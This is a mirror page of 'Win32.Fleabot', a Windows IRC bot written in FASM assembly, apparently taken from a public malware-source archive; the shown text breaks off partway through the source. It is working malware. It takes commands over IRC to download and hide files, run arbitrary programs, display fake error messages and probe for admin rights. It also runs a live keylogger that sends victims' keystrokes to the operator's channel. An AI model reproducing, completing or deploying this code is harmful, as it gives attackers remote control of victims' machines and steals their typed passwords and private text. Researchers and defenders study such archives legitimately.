mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
1192 lines
65 KiB
NASM
1192 lines
65 KiB
NASM
;Win32.Fleabot by DiA/RRLF
|
||
;DiA_hates_machine@gmx.de
|
||
;http://www.vx-dia.de.vu/
|
||
;
|
||
;Description:
|
||
; This is a small and simple IRC bot coded in assembler (use FASM to assemble). I
|
||
; wanted to write a small tutorial along with this source, but I am lazy dude ;).
|
||
; But don't cry, the code is very well commented and easy to understand. The bot
|
||
; has 12 commands, wich you can see in the example session. For greets and fucks
|
||
; use my guestbook at vx-dia.de.vu or drop me some mail to DiA_hates_machine@gmx.de
|
||
; Now have fun with this little code, assembled just 8kb baby.
|
||
;
|
||
;------- example session start------------------------------------------------------
|
||
;[10:52] * Now talking in #test
|
||
;[10:53] <DiAbolicx> ^^raw mode #test +o DiAbolicx
|
||
;[10:53] <workwqbz> bot is locked, use unlock <password>
|
||
;[10:53] <DiAbolicx> ^^unlock test
|
||
;[10:53] <workwqbz> bot now unlocked
|
||
;[10:53] <DiAbolicx> ^^raw mode #test +o DiAbolicx
|
||
;[10:53] * workwqbz sets mode: +o DiAbolicx
|
||
;[10:53] <DiAbolicx> ^^cmds
|
||
;[10:53] <workwqbz> unlock <password> - unlock the bot
|
||
;[10:53] <workwqbz> lock - lock the bot
|
||
;[10:53] <workwqbz> raw <irc command> - send irc command to server
|
||
;[10:53] <workwqbz> dl <http url> | <save as path> - download file from http
|
||
;[10:53] <workwqbz> exec <path> - execute a application
|
||
;[10:53] <workwqbz> msgbox <title> | <message> - show fake error message
|
||
;[10:53] <workwqbz> info - get username, system directory and is admin
|
||
;[10:53] <workwqbz> livelog - start logging keys and send it to channel
|
||
;[10:53] <workwqbz> stoplog - stop logging keys
|
||
;[10:53] <workwqbz> cmds - show available commands
|
||
;[10:53] <workwqbz> version - show bot version
|
||
;[10:53] <workwqbz> quit - quit bot
|
||
;[10:53] <DiAbolicx> ^^raw privmsg #test :yes, i am here
|
||
;[10:53] <workwqbz> yes, i am here
|
||
;[10:56] <DiAbolicx> ^^dl http://127.0.0.1/calc.exe | D:\calcx.exe
|
||
;[10:56] <workwqbz> download successful
|
||
;[10:56] <DiAbolicx> ^^exec D:\calcx.exe
|
||
;[10:57] <workwqbz> successful executed
|
||
;[10:57] <DiAbolicx> ^^msgbox Fleabot | Test message, dude
|
||
;[10:57] <workwqbz> message box closed by user
|
||
;[10:57] <DiAbolicx> ^^info
|
||
;[10:57] <workwqbz> Username: Work, System directory: C:\WINDOWS\system32, Admin: No
|
||
;[10:58] <DiAbolicx> ^^version
|
||
;[10:58] <workwqbz> Fleabot - a example IRC bot in asm
|
||
;[10:58] <DiAbolicx> ^^livelog
|
||
;[10:58] <workwqbz> live keylogging thread created
|
||
;[10:58] <workwqbz> {crlf}THIS IS A TEST I TYPE THIS IN MY EDITOR AND
|
||
;[10:58] <workwqbz> KEYS ARE REDIRECTED TO THE PREDEFINED IRC CHANNEL{crlf}
|
||
;[10:58] <DiAbolicx> ^^stoplog
|
||
;[10:58] <workwqbz> keylogging thread terminated
|
||
;[10:59] <DiAbolicx> ^^quit
|
||
;[10:59] * workwqbz (~workwqbz@dianet.org) Quit (workwqbz)
|
||
;------- example session end--------------------------------------------------------
|
||
|
||
|
||
|
||
include "%fasminc%\win32ax.inc" ;equates, api's and macros making living easier
|
||
|
||
entry Bot ;define code start
|
||
|
||
IRCServer equ "127.0.0.1", 0 ;to this server we want to connect
|
||
IRCPort equ 6667d ;connect using this port
|
||
Channel equ "#test", 0 ;channel name
|
||
ChannelPassword equ "test", 0 ;the channel password
|
||
CommandPrefix equ "^^" ;what indicate commands
|
||
BotPassword equ "test", 0 ;bot password
|
||
CRLF equ 10d, 13d ;break
|
||
|
||
|
||
section '.data' data readable writeable ;here our datas will be stored
|
||
Version db "Fleabot - a example IRC bot in asm", 0 ;identify bot version
|
||
|
||
IsLocked db 0d ;to check if bot is locked or not
|
||
WSAData WSADATA ;used by WSAStartup, cleanup
|
||
SocketDesc dd ? ;socket descriptor is stored here
|
||
SockAddr dw AF_INET ;our sockaddr_in structure
|
||
SockAddr_Port dw ? ;here we save the port
|
||
SockAddr_IP dd ? ;here we save the ip
|
||
SockAddr_Zero rb 8d ;unused
|
||
RandomString rb 5d ;here we save a random string (a - z) for the nick
|
||
Username rb 36d ;here we store the user name for nick generation
|
||
UsernameSize dd 36d ;size of the buffer
|
||
Nickname rb 9d ;buffer for nickname
|
||
SendBuffer rb 512d ;the buffer where we store bytes to send
|
||
ReturnBuffer rb 512d ;the buffer where we story things to receive
|
||
ByteBuffer rb 2d ;for the RecvLine procedure
|
||
Pong db "PONG " ;prefix pong message
|
||
PongBuffer rb 16d ;buffer for the pong message
|
||
CommandBuffer rb 128d ;buffer to store command and parameters
|
||
Parameter1 rb 128d ;buffer for parameter 1
|
||
Parameter2 rb 128d ;buffer for parameter 2
|
||
InetHandle dd ? ;handle for download command
|
||
UrlHandle dd ? ;handle for download command
|
||
FileHandle dd ? ;handle of open files
|
||
ReadNext dd ? ;how much else to download
|
||
DownloadBuffer rb 1024d ;downoad kb for kb
|
||
BytesWritten dd ? ;for writefile
|
||
StartupInfo STARTUPINFO ;for create process
|
||
ProcessInfo PROCESS_INFORMATION ;for create process
|
||
SystemDir rb 256d ;buffer for system dir
|
||
ThreadId dd ? ;for creating live keylog thread
|
||
ThreadHandle dd ? ;store handle for thread
|
||
ThreadExitCode dd ? ;for terminating thread
|
||
KeylogBuffer rb 60d ;buffer for key strokes
|
||
|
||
|
||
section '.code' code readable executable ;code section
|
||
Bot: ;lets start
|
||
invoke WSAStartup,\ ;initiates sockets DLL
|
||
0101h,\ ;use version 1.1
|
||
WSAData ;pointer to wsadata strcuture
|
||
|
||
cmp eax, 0 ;successful?
|
||
jne Exit ;if not exit bot
|
||
|
||
invoke socket,\ ;create a socket
|
||
AF_INET,\ ;family
|
||
SOCK_STREAM,\ ;two way connection
|
||
0 ;no particular protocol
|
||
|
||
cmp eax, -1 ;successful?
|
||
je Exit ;if not exit
|
||
|
||
mov dword [SocketDesc], eax ;save socket descriptor
|
||
|
||
invoke inet_addr,\ ;covert ip string to dword
|
||
IRCServer ;the ip as string
|
||
|
||
mov dword [SockAddr_IP], eax ;save ip in sockaddr structure
|
||
|
||
invoke htons,\ ;convert port to the network byte order
|
||
IRCPort ;the port
|
||
|
||
mov word [SockAddr_Port], ax ;save it in the structure
|
||
|
||
invoke connect,\ ;now connect to server
|
||
dword [SocketDesc],\ ;the socket descriptor
|
||
SockAddr,\ ;pointer to the sockaddr structure
|
||
16d ;size of this structure
|
||
|
||
cmp eax, 0 ;successful?
|
||
jne Exit ;if not exit
|
||
|
||
call GenerateNickname ;generate the nickname
|
||
|
||
invoke lstrcpy,\ ;copy NICK to send buffer
|
||
SendBuffer,\ ;pointer
|
||
"NICK " ;nick command
|
||
|
||
invoke lstrcat,\ ;append the nickname
|
||
SendBuffer,\ ;to this
|
||
Nickname ;from this
|
||
|
||
call SendLine ;send buffer to irc server
|
||
|
||
invoke lstrcpy,\ ;copy USER to send buffer
|
||
SendBuffer,\ ;to this
|
||
"USER " ;from this
|
||
|
||
invoke lstrcat,\ ;append the nickname
|
||
SendBuffer,\ ;to this
|
||
Nickname ;from this
|
||
|
||
invoke lstrcat,\ ;append usermode
|
||
SendBuffer,\ ;to this
|
||
" 8 * :" ;usermode
|
||
|
||
invoke lstrcat,\ ;append nickname for user message
|
||
SendBuffer,\ ;to this
|
||
Nickname ;from this
|
||
|
||
call SendLine ;send buffer to server
|
||
|
||
GetMotd: ;we can join when "MOTD" message is over
|
||
call RecvLine ;get a line from server
|
||
call HandlePing ;handle ping
|
||
|
||
mov ecx, 0 ;clear counter
|
||
|
||
IsMotd: ;check for "MOTD"
|
||
cmp dword [ReturnBuffer + ecx], "MOTD" ;is there "MOTD"?
|
||
je HaveMotd ;then we can join
|
||
|
||
cmp byte [ReturnBuffer + ecx], 0d ;end of buffer?
|
||
je GetMotd ;check next line
|
||
|
||
inc ecx ;ecx + 1
|
||
jmp IsMotd ;check next position
|
||
|
||
HaveMotd: ;now we can join
|
||
invoke lstrcpy,\ ;copy JOIN to buffer
|
||
SendBuffer,\ ;pointer
|
||
"JOIN " ;join command
|
||
|
||
invoke lstrcat,\ ;append the channel
|
||
SendBuffer,\ ;pointer
|
||
Channel ;channel name
|
||
|
||
invoke lstrcat,\ ;append a space
|
||
SendBuffer,\ ;pointer
|
||
" " ;space
|
||
|
||
invoke lstrcat,\ ;append the channel password
|
||
SendBuffer,\ ;pointer
|
||
ChannelPassword ;pass
|
||
|
||
call SendLine ;send to server
|
||
|
||
invoke lstrcpy,\ ;copy MODE to buffer
|
||
SendBuffer,\ ;pointer
|
||
"MODE " ;to set key
|
||
|
||
invoke lstrcat,\ ;append channel
|
||
SendBuffer,\ ;pointer
|
||
Channel ;channel name
|
||
|
||
invoke lstrcat,\ ;append key mode and secret
|
||
SendBuffer,\ ;buffer
|
||
" +nsk " ;no external message, secret, key
|
||
|
||
invoke lstrcat,\ ;append the password aka key
|
||
SendBuffer,\ ;pointer
|
||
ChannelPassword ;the pass
|
||
|
||
call SendLine ;send it to irc server
|
||
|
||
RecvCommand: ;check if received line include a command
|
||
call RecvLine ;get a line
|
||
call HandlePing ;handle ping if it is
|
||
|
||
mov ecx, 0 ;set counter to zero
|
||
|
||
IsCommand: ;check if command
|
||
cmp word [ReturnBuffer + ecx], CommandPrefix ;is command prefix?
|
||
je HaveCommand ;then extract command
|
||
|
||
cmp byte [ReturnBuffer + ecx], 0 ;is end of line?
|
||
je RecvCommand ;then wait for next
|
||
|
||
inc ecx ;increase counter by one
|
||
jmp IsCommand ;check next position
|
||
|
||
HaveCommand: ;extract command
|
||
mov ebx, ReturnBuffer ;pointer to buffer
|
||
add ebx, ecx ;add counter
|
||
add ebx, 2d ;add length of command prefix
|
||
|
||
invoke lstrcpy,\ ;add to command buffer
|
||
CommandBuffer,\ ;pointer
|
||
ebx ;points to command position
|
||
|
||
call ExecuteCommand ;execute command
|
||
jmp RecvCommand ;next command
|
||
|
||
Exit:
|
||
invoke WSACleanup ;cleanup the wsa
|
||
|
||
invoke ExitProcess,\ ;exit program
|
||
0 ;exit code
|
||
|
||
|
||
SendLine: ;this procedure sends a line to the irc server
|
||
invoke lstrcat,\ ;append crlf to the send buffer
|
||
SendBuffer,\ ;buffer
|
||
CRLF ;10d, 13d
|
||
|
||
invoke lstrlen,\ ;get length of buffer
|
||
SendBuffer ;buffer
|
||
|
||
invoke send,\ ;send this line
|
||
dword [SocketDesc],\ ;socket descriptor
|
||
SendBuffer,\ ;send this
|
||
eax,\ ;length of buffer
|
||
0 ;no flags
|
||
|
||
cmp eax, -1 ;succeddful?
|
||
je Exit ;if not exit
|
||
ret ;return to call
|
||
|
||
|
||
RecvLine: ;this procedure receive a line from server
|
||
mov dword [ReturnBuffer], 0 ;clear the buffer
|
||
|
||
GetLine: ;recv until crlf
|
||
invoke recv,\ ;receive a byte
|
||
dword [SocketDesc],\ ;socket descriptor
|
||
ByteBuffer,\ ;1 byte buffer
|
||
1d,\ ;get just one byte
|
||
0 ;no flags
|
||
|
||
cmp eax, 0 ;error?
|
||
je Exit ;if so, exit
|
||
|
||
cmp byte [ByteBuffer], 10d ;arrived crlf?
|
||
je HaveLine ;then return
|
||
|
||
invoke lstrcat,\ ;append byte to buffer
|
||
ReturnBuffer,\ ;pointer
|
||
ByteBuffer ;the byte
|
||
|
||
jmp GetLine ;receive next byte
|
||
|
||
HaveLine: ;we have a line and can..
|
||
ret ;...return
|
||
|
||
|
||
GenerateNickname: ;this procedure generates a random nick
|
||
mov ecx, 0 ;clear counter
|
||
|
||
GetByte: ;get a single byte
|
||
invoke GetTickCount ;get the run time
|
||
|
||
cmp al, 97d ;after "a"
|
||
jnb CheckBelow ;if so, check if its before "z"
|
||
|
||
jmp Sleep33 ;sleep 33 ms
|
||
|
||
CheckBelow:
|
||
cmp al, 122d ;before "z"
|
||
jna HaveByte ;then save byte
|
||
|
||
jmp Sleep33 ;sleep 33 ms
|
||
|
||
HaveByte: ;save a byte
|
||
mov byte [RandomString + ecx], al ;save byte at the position
|
||
inc ecx ;ecx + 1
|
||
|
||
cmp ecx, 4d ;got 4 bytes?
|
||
je GenerateIt ;now generate it
|
||
|
||
Sleep33: ;sleep 33ms and try again to get a byte a - z
|
||
push ecx ;push counter
|
||
|
||
invoke Sleep,\ ;sleep
|
||
33d ;33ms
|
||
|
||
pop ecx ;restore counter
|
||
|
||
jmp GetByte ;try to get a byte a -z
|
||
|
||
GenerateIt: ;have random string, now create nick
|
||
invoke GetUserName,\ ;get the logged on user name
|
||
Username,\ ;pointer to buffer
|
||
UsernameSize ;size of buffer
|
||
|
||
cmp eax, 0 ;successful?
|
||
jne ExtractUserName ;if so jump there
|
||
|
||
mov dword [Username], "rrlf" ;no user name got, fill it with text anyways
|
||
|
||
ExtractUserName: ;get 4 bytes from the user name
|
||
mov byte [Username + 4d], 0 ;set string end at 5th position
|
||
|
||
invoke lstrcpy,\ ;copy username to nick buffer
|
||
Nickname,\ ;pointer to buffer
|
||
Username ;pointer to buffer
|
||
|
||
invoke lstrcat,\ ;append random string
|
||
Nickname,\ ;to this
|
||
RandomString ;from this
|
||
|
||
invoke CharLowerBuff,\ ;now mae nick to lower
|
||
Nickname,\ ;the nick
|
||
8d ;length
|
||
|
||
ret ;return to call
|
||
|
||
|
||
HandlePing: ;this procedure handle ping and pong
|
||
cmp dword [ReturnBuffer], "PING" ;is a ping?
|
||
jne NoPing ;if not return
|
||
|
||
invoke lstrcpy,\ ;copy ping message to buffer
|
||
PongBuffer,\ ;to this
|
||
ReturnBuffer + 6d ;sendbuffer + "PING "
|
||
|
||
invoke lstrcpy,\ ;copy PONG message to sendbuffer
|
||
SendBuffer,\ ;buffer
|
||
Pong ;pong message
|
||
|
||
call SendLine ;send pong
|
||
|
||
NoPing: ;its not a ping
|
||
ret ;return
|
||
|
||
SendPrivmsg: ;send a message to channel
|
||
invoke lstrcpy,\ ;copy PRIVMSG to send buffer
|
||
SendBuffer,\ ;pointer
|
||
"PRIVMSG " ;irc command
|
||
|
||
invoke lstrcat,\ ;append channel
|
||
SendBuffer,\ ;pointer
|
||
Channel ;the chan
|
||
|
||
invoke lstrcat,\ ;append space
|
||
SendBuffer,\ ;pointer
|
||
" :" ;sepertor
|
||
|
||
invoke lstrcat,\ ;append message
|
||
SendBuffer,\ ;pointer
|
||
ReturnBuffer ;pointer
|
||
|
||
call SendLine ;send to server
|
||
ret ;return
|
||
|
||
ExecuteCommand: ;execute received command
|
||
cmp dword [CommandBuffer], "unlo" ;is unlock command?
|
||
je CmdUnlock ;execute it
|
||
|
||
cmp byte [IsLocked], 0 ;is bot locked?
|
||
je BotLocked ;jmp there
|
||
|
||
cmp dword [CommandBuffer], "cmds" ;is commands command?
|
||
je CmdCmds ;then show commands
|
||
|
||
cmp dword [CommandBuffer], "lock" ;is lock command?
|
||
je CmdLock ;lock it then
|
||
|
||
cmp dword [CommandBuffer], "quit" ;is quit command?
|
||
je CmdQuit ;quit from irc, exit
|
||
|
||
cmp dword [CommandBuffer], "raw " ;is raw command?
|
||
je CmdRaw ;execute raw irc command
|
||
|
||
cmp word [CommandBuffer], "dl" ;is download command?
|
||
je CmdDl ;download file from http
|
||
|
||
cmp dword [CommandBuffer], "exec" ;is execute command?
|
||
je CmdExec ;then execute application
|
||
|
||
cmp dword [CommandBuffer], "vers" ;is version command?
|
||
je CmdVersion ;show it then
|
||
|
||
cmp dword [CommandBuffer], "msgb" ;is msgbox command?
|
||
je CmdMsgbox ;show it then
|
||
|
||
cmp dword [CommandBuffer], "info" ;is info command?
|
||
je CmdInfo ;then show informations about victim
|
||
|
||
cmp dword [CommandBuffer], "live" ;is livelog command?
|
||
je CmdLivelog ;log it then
|
||
|
||
cmp dword [CommandBuffer], "stop" ;is stoplog command?
|
||
je CmdStoplog ;stop it then
|
||
|
||
invoke lstrcpy,\ ;unknown command
|
||
ReturnBuffer,\ ;pointer
|
||
"unknown command, type 'cmds' for commands" ;mesage
|
||
|
||
call SendPrivmsg ;send to chan
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
BotLocked:
|
||
invoke lstrcpy,\ ;copy locked message to return buffer
|
||
ReturnBuffer,\ ;pointer
|
||
"bot is locked, use unlock <password>" ;message
|
||
|
||
call SendPrivmsg ;send it
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
CmdUnlock: ;unlock command
|
||
invoke lstrlen,\ ;get password len
|
||
BotPassword ;of this
|
||
|
||
inc eax ;eax + 1
|
||
|
||
invoke lstrcpyn,\ ;copy password to parameter1 buffer
|
||
Parameter1,\ ;pointer
|
||
CommandBuffer + 7d,\ ;skip "unlock "
|
||
eax ;dont copy the crlf
|
||
|
||
invoke lstrcmp,\ ;compare password
|
||
BotPassword,\ ;password
|
||
Parameter1 ;received password
|
||
|
||
cmp eax, 0 ;right pass?
|
||
jne WrongPassword ;if not send back wrong pass
|
||
|
||
mov byte [IsLocked], 1d ;set unlock code
|
||
|
||
invoke lstrcpy,\ ;tell user bot is unlocked
|
||
ReturnBuffer,\ ;buffer
|
||
"bot now unlocked" ;message
|
||
|
||
call SendPrivmsg ;send to channel
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
WrongPassword:
|
||
invoke lstrcpy,\ ;copy wrong pass message
|
||
ReturnBuffer,\ ;pointer
|
||
"wrong password" ;message
|
||
|
||
call SendPrivmsg ;send to chan
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
CmdCmds: ;show all comands
|
||
invoke lstrcpy,\ ;copy unlock command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"unlock <password> - unlock the bot" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke Sleep,\ ;sleep a second
|
||
1000d ;1 sec
|
||
|
||
invoke lstrcpy,\ ;copy lock command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"lock - lock the bot" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke Sleep,\ ;sleep a second
|
||
1000d ;1 sec
|
||
|
||
invoke lstrcpy,\ ;copy raw command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"raw <irc command> - send irc command to server" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke Sleep,\ ;sleep a second
|
||
1000d ;1 sec
|
||
|
||
invoke lstrcpy,\ ;copy dl command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"dl <http url> | <save as path> - download file from http" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke Sleep,\ ;sleep a second
|
||
1000d ;1 sec
|
||
|
||
invoke lstrcpy,\ ;copy exec command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"exec <path> - execute a application" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke Sleep,\ ;sleep a second
|
||
1000d ;1 sec
|
||
|
||
invoke lstrcpy,\ ;copy msgbox command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"msgbox <title> | <message> - show fake error message" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke Sleep,\ ;sleep a second
|
||
1000d ;1 sec
|
||
|
||
invoke lstrcpy,\ ;copy info command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"info - get username, system directory and is admin" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke Sleep,\ ;sleep a second
|
||
1000d ;1 sec
|
||
|
||
invoke lstrcpy,\ ;copy livelog command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"livelog - start logging keys and send it to channel" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke Sleep,\ ;sleep a second
|
||
1000d ;1 sec
|
||
|
||
invoke lstrcpy,\ ;copy stoplog command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"stoplog - stop logging keys" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke Sleep,\ ;sleep a second
|
||
1000d ;1 sec
|
||
|
||
invoke lstrcpy,\ ;copy cmds command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"cmds - show available commands" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke lstrcpy,\ ;copy version command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"version - show bot version" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke Sleep,\ ;sleep a second
|
||
1000d ;1 sec
|
||
|
||
invoke lstrcpy,\ ;copy quit command
|
||
ReturnBuffer,\ ;pointer to buffer
|
||
"quit - quit bot" ;message
|
||
|
||
call SendPrivmsg ;send it to channel
|
||
|
||
invoke Sleep,\ ;sleep a second
|
||
1000d ;1 sec
|
||
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
CmdLock: ;lock command
|
||
mov byte [IsLocked], 0 ;set it as locked
|
||
|
||
invoke lstrcpy,\ ;return message
|
||
ReturnBuffer,\ ;buffer
|
||
"bot now locked" ;message
|
||
|
||
call SendPrivmsg ;send it
|
||
jmp ExecuteCommandReturn ;and return
|
||
|
||
CmdQuit: ;quit bot
|
||
invoke lstrcpy,\ ;copy QUIT to buffer
|
||
SendBuffer,\ ;pointer
|
||
"QUIT" ;quit command
|
||
|
||
call SendLine ;send it
|
||
|
||
invoke Sleep,\ ;sleep
|
||
2000d ;2 seconds
|
||
|
||
jmp Exit ;exit bot
|
||
|
||
CmdRaw: ;send raw command to irc server
|
||
invoke lstrcpy,\ ;copy command to buffer
|
||
SendBuffer,\ ;buffer
|
||
CommandBuffer + 4 ;skip "raw "
|
||
|
||
call SendLine ;send it
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
CmdDl: ;download file via http
|
||
call ExtractParameters ;get the two parameters
|
||
|
||
invoke InternetOpen,\ ;initialise wininet
|
||
Parameter1,\ ;use url as agent, not necessary
|
||
0,\ ;get configs from registry (INTERNET_OPEN_TYPE_PRECONFIG)
|
||
0,\ ;no proxy
|
||
0,\ ;also no bypass
|
||
0 ;no flags
|
||
|
||
cmp eax, 0 ;error?
|
||
je DownloadFileError ;if so jump to error
|
||
|
||
mov dword [InetHandle], eax ;save handle
|
||
|
||
invoke InternetOpenUrl,\ ;open the http url
|
||
dword [InetHandle],\ ;handle from internetopen
|
||
Parameter1 + 3,\ ;pointer to the url, pass "dl "
|
||
0,\ ;no need for headers
|
||
0,\ ;so are the length
|
||
0,\ ;no specific flags
|
||
0 ;no context needed
|
||
|
||
cmp eax, 0 ;error?
|
||
je DownloadFileError ;then show error
|
||
|
||
mov dword [UrlHandle], eax ;save handle
|
||
|
||
invoke CreateFile,\ ;create the file for writing
|
||
Parameter2,\ ;pointer to filename
|
||
GENERIC_WRITE,\ ;we just want to write
|
||
FILE_SHARE_WRITE,\ ;write it
|
||
0,\ ;security attributes, nohh
|
||
CREATE_NEW,\ ;fail if file exist
|
||
FILE_ATTRIBUTE_HIDDEN,\ ;make it as hidden
|
||
0 ;no template file
|
||
|
||
cmp eax, 0 ;error?
|
||
je DownloadFileError ;send error back
|
||
|
||
mov dword [FileHandle], eax ;save handle
|
||
|
||
inc dword [ReadNext] ;increase readnext by one
|
||
|
||
ReadNextBytes: ;read bytes by bytes
|
||
cmp dword [ReadNext], 0 ;no more to read
|
||
je DownloadComplete ;then download complete
|
||
|
||
invoke InternetReadFile,\ ;read from the open url
|
||
dword [UrlHandle],\ ;open handle
|
||
DownloadBuffer,\ ;pointer to buffer
|
||
1024d,\ ;bytes to read, kbyte by kbyte
|
||
ReadNext ;how much bytes readed?
|
||
|
||
invoke WriteFile,\ ;write bytes to file
|
||
dword [FileHandle],\ ;open handle
|
||
DownloadBuffer,\ ;point to downloaded bytes
|
||
dword [ReadNext],\ ;write that much bytes
|
||
BytesWritten,\ ;how much bytes are written
|
||
0 ;no overlapped
|
||
|
||
jmp ReadNextBytes ;process next bytes
|
||
|
||
DownloadComplete: ;download is complete
|
||
invoke CloseHandle,\ ;close file
|
||
dword [FileHandle] ;via handle
|
||
|
||
invoke InternetCloseHandle,\ ;close inet
|
||
dword [UrlHandle] ;via handle
|
||
|
||
invoke InternetCloseHandle,\ ;again
|
||
dword [InetHandle] ;via handle
|
||
|
||
invoke lstrcpy,\ ;copy success message
|
||
ReturnBuffer,\ ;to return buffer
|
||
"download successful" ;message
|
||
|
||
call SendPrivmsg ;send to channel
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
DownloadFileError:
|
||
invoke lstrcpy,\ ;copy fail message
|
||
ReturnBuffer,\ ;to return buffer
|
||
"download failed" ;message
|
||
|
||
call SendPrivmsg ;send to channel
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
CmdExec: ;execute a file
|
||
invoke lstrlen,\ ;get length of buffer
|
||
CommandBuffer ;of this
|
||
|
||
mov byte [CommandBuffer + eax - 1], 0 ;clear the crlf
|
||
|
||
invoke CreateProcess,\ ;via create process
|
||
CommandBuffer + 5d,\ ;application, skip "exec "
|
||
CommandBuffer + 5d,\ ;user
|
||
0,\ ;no process attributes
|
||
0,\ ;no thread attributes
|
||
0,\ ;no inerhits
|
||
CREATE_NEW_CONSOLE,\ ;own process
|
||
0,\ ;no environment
|
||
0,\ ;nor current directory
|
||
StartupInfo,\ ;startup structure
|
||
ProcessInfo ;process structure
|
||
|
||
cmp eax, 0 ;error?
|
||
je ExecError ;show it then
|
||
|
||
invoke lstrcpy,\ ;copy message
|
||
ReturnBuffer,\ ;to this
|
||
"successful executed" ;yehaw
|
||
|
||
call SendPrivmsg ;send to chan
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
ExecError: ;error occured
|
||
invoke lstrcpy,\ ;copy message
|
||
ReturnBuffer,\ ;to this
|
||
"execution failed" ;damn
|
||
|
||
call SendPrivmsg ;send to chan
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
CmdVersion: ;show bot version
|
||
invoke lstrcpy,\ ;copy version to buffer
|
||
ReturnBuffer,\ ;pointer
|
||
Version ;from version
|
||
|
||
call SendPrivmsg ;send to channel
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
CmdMsgbox: ;show a error message box
|
||
call ExtractParameters ;get two parameters
|
||
|
||
invoke MessageBox,\ ;show messagbox, local
|
||
0,\ ;no owner
|
||
Parameter2,\ ;Text
|
||
Parameter1 + 7d,\ ;title, skip "msgbox "
|
||
MB_ICONERROR ;error style
|
||
|
||
invoke lstrcpy,\ ;copy message
|
||
ReturnBuffer,\ ;pointer
|
||
"message box closed by user" ;message
|
||
|
||
call SendPrivmsg ;send to channe<6E>
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
CmdInfo: ;show informations
|
||
invoke lstrcpy,\ ;copy "Username" to buffer
|
||
ReturnBuffer,\ ;pointer
|
||
"Username: " ;msg
|
||
|
||
invoke GetUserName,\ ;get user name
|
||
Username,\ ;buffer
|
||
UsernameSize ;size
|
||
|
||
invoke lstrcat,\ ;copy username
|
||
ReturnBuffer,\ ;buffer
|
||
Username ;pointer
|
||
|
||
invoke lstrcat,\ ;copy "sysdir"
|
||
ReturnBuffer,\ ;to buffer
|
||
", System directory: " ;msg
|
||
|
||
invoke GetSystemDirectory,\ ;get sys dir to test
|
||
SystemDir,\ ;buffer
|
||
256d ;size
|
||
|
||
invoke lstrcat,\ ;copy to buffer
|
||
ReturnBuffer,\ ;to buffer
|
||
SystemDir ;from here
|
||
|
||
invoke lstrcat,\ ;append "admin"
|
||
ReturnBuffer,\ ;buffer
|
||
", Admin: "
|
||
|
||
invoke lstrcat,\ ;append filename to system dir
|
||
SystemDir,\ ;to buffer
|
||
"DiA.RRLF" ;filename ;)
|
||
|
||
invoke CreateFile,\ ;try to create this file
|
||
SystemDir,\ ;file in system directory
|
||
GENERIC_WRITE,\ ;check write
|
||
FILE_SHARE_WRITE,\ ;yeh
|
||
0,\ ;no security attributes
|
||
CREATE_ALWAYS,\ ;overwrite if exist
|
||
FILE_ATTRIBUTE_HIDDEN,\ ;as hidden
|
||
0 ;no template file
|
||
|
||
cmp eax, -1 ;error?
|
||
je NoAdmin ;then user is no admin
|
||
|
||
invoke lstrcat,\ ;copy "yes"
|
||
ReturnBuffer,\ ;to buffer
|
||
"Yes" ;message
|
||
|
||
call SendPrivmsg ;send to channel
|
||
jmp ExecuteCommandReturn ;and return
|
||
|
||
NoAdmin: ;user is no admin
|
||
invoke lstrcat,\ ;copy "no"
|
||
ReturnBuffer,\ ;to buffer
|
||
"No" ;message
|
||
|
||
call SendPrivmsg ;send to channel
|
||
jmp ExecuteCommandReturn ;and return
|
||
|
||
CmdLivelog: ;create a thread for live keylogging
|
||
invoke CreateThread,\ ;create the keylog thread
|
||
0,\ ;no security attributes
|
||
0,\ ;default stack size
|
||
LiveKeylog,\ ;procedure start
|
||
0,\ ;no parameters
|
||
0,\ ;start right now
|
||
ThreadId ;store here the thread id
|
||
|
||
cmp eax, 0 ;error?
|
||
je ThreadError ;then jump there
|
||
|
||
mov dword [ThreadHandle], eax ;store thread handle
|
||
|
||
invoke lstrcpy,\ ;copy success message
|
||
ReturnBuffer,\ ;to the buffer
|
||
"live keylogging thread created" ;yehaw
|
||
|
||
call SendPrivmsg ;send to channel
|
||
jmp ExecuteCommandReturn ;ret
|
||
|
||
ThreadError:
|
||
invoke lstrcpy,\ ;copy error message
|
||
ReturnBuffer,\ ;to this
|
||
"error on creating live keylogging thread" ;buh
|
||
|
||
call SendPrivmsg ;send it
|
||
jmp ExecuteCommandReturn ;return
|
||
|
||
CmdStoplog: ;stop keylogging thread
|
||
invoke GetExitCodeThread,\ ;get exit code to terminate thread
|
||
